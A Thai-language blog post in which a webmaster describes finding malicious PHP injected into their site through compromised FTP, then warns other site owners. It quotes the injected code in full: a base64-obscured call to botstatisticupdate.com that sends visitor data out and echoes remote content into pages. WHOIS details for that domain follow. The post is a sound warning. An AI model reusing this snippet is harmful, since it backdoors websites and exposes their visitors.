เช้านี้ตรวจสอบ backlink ว่าทำไมเว็บตัวเองถึงอันดับตกเอาๆ ตอนแรกก็ดูจากสถิติ google ผลปรากฏว่า index ลดลงเรื่อยๆ บางวันก็เท่าเดิม ทั้งๆ ที่เนื้อหาเวลา update มันก็เข้ามาเก็บแ้ล้วก็โชว์ในผลการค้นหาตลอด วันละ 2-3 link เดือนนึงก็น่าจะอยู่ที่ 30-40 links แต่พอตรวจสอบ links รวมๆ ก็ยังเท่าเดิม เลยเช็ค backlink ปรากฏว่าลดลงอย่างน่าตกใจ เลยคิดว่าจะทำ สะพานบอท อีกรอบ เลยเข้าไปเพิ่มและเช็คดู สะพานบอทเก่า ที่ทำไว้ว่าจะเอามาอัพเดท

ปรากฏว่าไม่แสดงข้อมูลซะงั้น เป็นค่า 403 Forbidden เฉยเลย ก็เลยลองตรวจสอบไฟล์ต้นฉบับ ตรวจไปตรวจมา เจอ code php แปลกๆ ตรวจสอบ code มาจาก

botstatisticupdate.com/stat/stat.php?ip=
botsvsbrowsers.com

เจ้าสองตัวนี้เลย ตอนนี้ต่างประเทศก็กำลังวุ่นวายกันใหญ่ เปรตมากๆ มาแทรกในไฟล์ index กับไฟล์อื่นๆ ที่ถูกเจาะเข้ามาทาง ftp แล้วเข้าไป upload หน้าตาเฉย จึงอยากบ่นให้ฟังว่า ระวังกันด้วย ตรวจสอบไฟล์เว็บของตัวเองบ่อยๆ ด้วยนะ เผื่อเจอไอ้พวกไม่สร้างสรร เอาแต่สบาย ใช้ความรู้ในทางที่ผิด เซ็งเลย ต้องมานั่งแก้กันทั้งวัน

< ?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); @$stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } ?>

Malwaree botstatisticupdate มันเข้ามาเพิ่ม code php ในไฟล์ทาง ftp

Domain Names Transferred Into QWKSPSPL.COM

Currently displaying 6 of 6 domain names transferred into qwkspspl.com on March 31, 2012.
Download all qwkspspl.com activity for March 31, 2012(.CSV)
Domain Name——————-Transferred From
botstatisticupdate.com——————-nskin123.com

Domain name: botstatisticupdate.com

Registrant Contact:
PatrosInc
Janice Haddix janicefhaddix@teleworm.com
0441251210 fax: 0441251210
Rengaskuja 66
NASKARLA NASKARLA 21520
fi

Administrative Contact:
Janice Haddix janicefhaddix@teleworm.com
0441251210 fax: 0441251210
Rengaskuja 66
NASKARLA NASKARLA 21520
fi

Technical Contact:
Janice Haddix janicefhaddix@teleworm.com
0441251210 fax: 0441251210
Rengaskuja 66
NASKARLA NASKARLA 21520
fi

Billing Contact:
Janice Haddix janicefhaddix@teleworm.com
0441251210 fax: 0441251210
Rengaskuja 66
NASKARLA NASKARLA 21520
fi

DNS:
ns1.qwkspspl.com
ns2.qwkspspl.com
ns3.qwkspspl.com
ns4.qwkspspl.com

Created: 2012-03-26
Expires: 2013-03-26